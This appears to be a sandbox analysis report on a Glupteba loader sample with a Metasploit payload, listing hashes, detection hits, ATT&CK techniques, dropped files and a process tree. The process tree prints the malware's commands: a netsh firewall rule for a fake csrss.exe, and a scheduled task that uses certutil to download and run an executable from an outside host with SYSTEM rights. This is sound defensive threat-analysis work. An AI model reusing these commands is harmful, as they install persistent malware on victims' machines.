glupteba | a951b0a48877f40e9630d1a4a8f5f37f8b376800e185d4c70e241917249cf48e

Analysis

max time kernel
3s
max time network
155s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
29/12/2023, 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0367b08d1b72bd3d0fdca7de187b9dc6.exe
Size

4.4MB
MD5

0367b08d1b72bd3d0fdca7de187b9dc6
SHA1

8fb04d525032edd7cabaf50af9f493ee04c58a48
SHA256

a951b0a48877f40e9630d1a4a8f5f37f8b376800e185d4c70e241917249cf48e
SHA512

14d03cf0d3564a1337fca87c16ad1df08687c5daa431f406dc1492d00a0985333fd1f59e3c521b67211c7f25af60b417042ca88e3b436ffe4ebc4ab566af44f6
SSDEEP

98304:8Iu065i558It90eELh3/9QAtK6QqASVUFhm7aRVpAvHfWK1kIqKlbSs5tT1gArJR:c0ui558I8eyh3VVCqARFhGO+OsoKnJdb

Score

10^/10

glupteba metasploit backdoor dropper evasion loader trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 21 IoCs

resource	yara_rule
behavioral1/memory/1320-2-0x0000000004590000-0x0000000004EB6000-memory.dmp	family_glupteba
behavioral1/memory/1320-3-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/1320-4-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/1320-6-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/1320-7-0x0000000004590000-0x0000000004EB6000-memory.dmp	family_glupteba
behavioral1/memory/1320-8-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/1320-9-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/1320-10-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2668-13-0x0000000004580000-0x0000000004EA6000-memory.dmp	family_glupteba
behavioral1/memory/2668-14-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2668-34-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-39-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-43-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2492-44-0x0000000140000000-0x00000001405E8000-memory.dmp	family_glupteba
behavioral1/memory/2168-46-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-49-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-55-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-59-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-68-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-120-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba
behavioral1/memory/2168-121-0x0000000000400000-0x00000000027D9000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2956	netsh.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1872	schtasks.exe
632	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\0367b08d1b72bd3d0fdca7de187b9dc6.exe
"C:\Users\Admin\AppData\Local\Temp\0367b08d1b72bd3d0fdca7de187b9dc6.exe"
1⤵
PID:1320
- C:\Users\Admin\AppData\Local\Temp\0367b08d1b72bd3d0fdca7de187b9dc6.exe
  "C:\Users\Admin\AppData\Local\Temp\0367b08d1b72bd3d0fdca7de187b9dc6.exe"
  2⤵
  PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:2844
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2956
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe /124-124
    3⤵
    PID:2168
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:1872
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:632
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      PID:2492

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231229232838.log C:\Windows\Logs\CBS\CbsPersist_20231229232838.cab
1⤵
PID:2656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabE40A.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE5D2.tmp

Filesize
10KB

MD5
575024f973f230ec73b65dfa2d1138aa

SHA1
db46aa0648de3cc5b46865783152c1a344b55617

SHA256
821413ade17391be13f06408f7ac2b4b72d6afeeeb4c5be47c67524ffd4c390f

SHA512
aa0031f19e46bc8617a954e4d13bec24bc792f127cb27571563655c6ca4e9ee4dd2b0ca004e92541fe6a1809abc2ce797e20c91697c1f53676bba6efb2484feb

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
136KB

MD5
b1af5140ef6429d99ae66eb15e1ce49a

SHA1
44d871da1fb1108c6a09475575ff24a4da69a811

SHA256
8ed0eba64174d429230f6a9b29161dda02ef955e4b660bdf865bbb856577883f

SHA512
66ecea954b419610ab8fba777c22d073674955230ee3297f8dd2b101a81836bc09a068fd584b603f7f8ab266fc4b77bf5873b64ea3d8716de091a1146e2cfa72

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
160KB

MD5
c704090c3f94f78e1861eb6329b72255

SHA1
25297cf95dfab5b661a3e5c8abc72e80a93c1648

SHA256
322cd27b08840c2b7e8336eb11e37299214f4082e587bcc6164ab2dfed82f6fc

SHA512
38b7a7f4c8e78695f32dc6ae73330f4a04c38c733e23878bfe8c4bdedb5935a7c174890f4deaaabc3e240d0805a1b4c75e5678fc06996c03571e169836ca37ea

Download Submit
C:\Windows\rss\csrss.exe

Filesize
159KB

MD5
927e63c5561ea3c192d39fbd3e18e51f

SHA1
6bff5996b634b753b8e5fee8af18371fdb5fa58f

SHA256
bbff0e1aa5c0209efbf63b1cf9516c219b3dbbb93ce0bdd52af5e67442c64d1c

SHA512
beb0c70390961cc3359ee63c2cd5960e562e11f28c6f2034b3f0108889796eeee897ea4ffa86f64ab960377474d78f1c5875877c792d0ecd6ca86bcf025fa866

Download Submit
C:\Windows\rss\csrss.exe

Filesize
380KB

MD5
f453422e6e202b5b555b0033eee7e052

SHA1
b6a0b86cd37bb886379ad40bac8384df9c07a2b5

SHA256
9d5f437d66e46917fca22c73aa21ed6266ccc6f59f90c92946f73ff4072d021d

SHA512
effc40a2519ab471f2afebbf5acecae1105b62f8d7f672dcd3081bd2293f42a0b6dcbb2841d2690a8f4dcac768bf8e1b72e63cef7ce90a2fd82741664b86a766

Download Submit
C:\Windows\rss\csrss.exe

Filesize
136KB

MD5
2c38d4b48594872b3bff7a29093ad75f

SHA1
4c3160451b6a990968890f39aacd6c8302474514

SHA256
130b4dd78e1c33ad390b6b577fd60b3c409da6c9e002cab03773d6371a52f847

SHA512
d7865a3799cb3e636e24fc81c385fe97f97b1262e42cf413f87669a3aff804e2738fdba898df9ff4267c37909d483afd99fa694e1cf6203ecf115722039ef71e

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
139KB

MD5
ea0453f518eeb987d08c9872c8aa4160

SHA1
dec299028e8e81d237814e6f7db69381dd4fd6cb

SHA256
8e32c5da18e00903623ecc187268c9828c24785f9a38d074ee1da2e6d919e5d0

SHA512
5687b749b9643c50aeb90079da80942571352e901dc4cc6662810fc683b452e22f3e466a8e38fee59d3bb57be175eaccff2f62410e3c029ac914319324087804

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
308KB

MD5
a39f8c376025164555c76fb2370ce134

SHA1
522039fac07d0c7d4bdab891395c555db011e514

SHA256
d18965c5970215ea57f7340de84ea6c9113464a6c454fa4cb8263cae87216c29

SHA512
55953056cca35beba6e0f3d89639346ecc59d503132e1670bc72b49f8586997f8ea054b7ece16ac9d0d27f84f46b52e11c185072e07095889d8e5632a747db1c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
300KB

MD5
5e2c10c8086fb779bfc33de54f85a8e6

SHA1
ca32c76a351ed2c84d3a9ef8c7fa52613d1c6771

SHA256
7c3aa3d09de01d18907f9bc13661e2494d6d9d6ce227ef15cbc468b721a074d6

SHA512
84c4be48ea8fa27119f8703ef1e754c38f2d2608e42d7ce359ca48c681b3b8fc084f518949308325d0425644645477e74db467a0692f46c69162186deb028448

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
246KB

MD5
9be6f5ac9d6f52cf317dfd1b4dc5e3d8

SHA1
4346ca9c423fef86475f517c0a7e5584b477435a

SHA256
37aadef18b35cd27c9efc84bb77d55447385aa6ce58ad272e95409a5a56afbae

SHA512
7b5df479f40381cb8419761e694bddf03e74f60da4f2f427239ea6f67079064dea424ebc659371bc7a065a69ad045f948744b25a15b32f64f50d3a675485965d

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
460KB

MD5
532cb3062756a60fd0903f43a9e30474

SHA1
895db6679fc1a5990e7da5a4882ea81ec56f5dc2

SHA256
9d80dbe241f76e980290fc144fb9f9e23cfbdbac0a4d74e075f696b447d2b3bf

SHA512
c1385bf901058431f155d0666b989190189755f6b88210173a02e1b950efe78ea8fc14df80aec2e71420af6a41eada818ef58eb77121e1cfba475aa4d4f689e6

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe

Filesize
272KB

MD5
48cc89d786e59e79110f13460601e55b

SHA1
c88dab43eba2357ab714fe683ac19d99b2bdc0f0

SHA256
177f0745f6ddc32decd6ec6bd1f61ed0d23f8ab587bc0840015320b8050788e6

SHA512
0dcb2682809a5b106b4182820ceebacbe2e9118f0686ee2391ff1c38fa35459144521f31467eca95aad026f1ead011b0196fadf1d0c7fc6af5c6bb28be6e236a

Download Submit
\Windows\rss\csrss.exe

Filesize
244KB

MD5
cd2a54fc7027ac5c523604108cce4144

SHA1
df85d907905d09130b2dac7ab4f6df39bed7976f

SHA256
2c496a930ee992cf4a58dd0854ad18832eb805693fd7ca29083bd97da1648cdd

SHA512
bd62b79ef1639992e42c07cf0db0a6936dcfefc26755550685f267fba37fca87b44b2a78c411b409326b8fc32839549cface0c79c614a747b8dd127dfccd27f1

Download Submit
memory/1320-10-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/1320-9-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/1320-8-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/1320-7-0x0000000004590000-0x0000000004EB6000-memory.dmp

Filesize
9.1MB

Download
memory/1320-6-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/1320-5-0x0000000004150000-0x000000000458C000-memory.dmp

Filesize
4.2MB

Download
memory/1320-0-0x0000000004150000-0x000000000458C000-memory.dmp

Filesize
4.2MB

Download
memory/1320-4-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/1320-3-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/1320-2-0x0000000004590000-0x0000000004EB6000-memory.dmp

Filesize
9.1MB

Download
memory/1320-1-0x0000000004150000-0x000000000458C000-memory.dmp

Filesize
4.2MB

Download
memory/2168-59-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-68-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-123-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-46-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-48-0x0000000004030000-0x000000000446C000-memory.dmp

Filesize
4.2MB

Download
memory/2168-49-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-39-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-37-0x0000000004030000-0x000000000446C000-memory.dmp

Filesize
4.2MB

Download
memory/2168-55-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-122-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-121-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-120-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2168-35-0x0000000004030000-0x000000000446C000-memory.dmp

Filesize
4.2MB

Download
memory/2168-43-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2492-66-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2492-57-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2492-44-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2668-14-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2668-13-0x0000000004580000-0x0000000004EA6000-memory.dmp

Filesize
9.1MB

Download
memory/2668-12-0x0000000004140000-0x000000000457C000-memory.dmp

Filesize
4.2MB

Download
memory/2668-11-0x0000000004140000-0x000000000457C000-memory.dmp

Filesize
4.2MB

Download
memory/2668-34-0x0000000000400000-0x00000000027D9000-memory.dmp

Filesize
35.8MB

Download
memory/2668-36-0x0000000004140000-0x000000000457C000-memory.dmp

Filesize
4.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads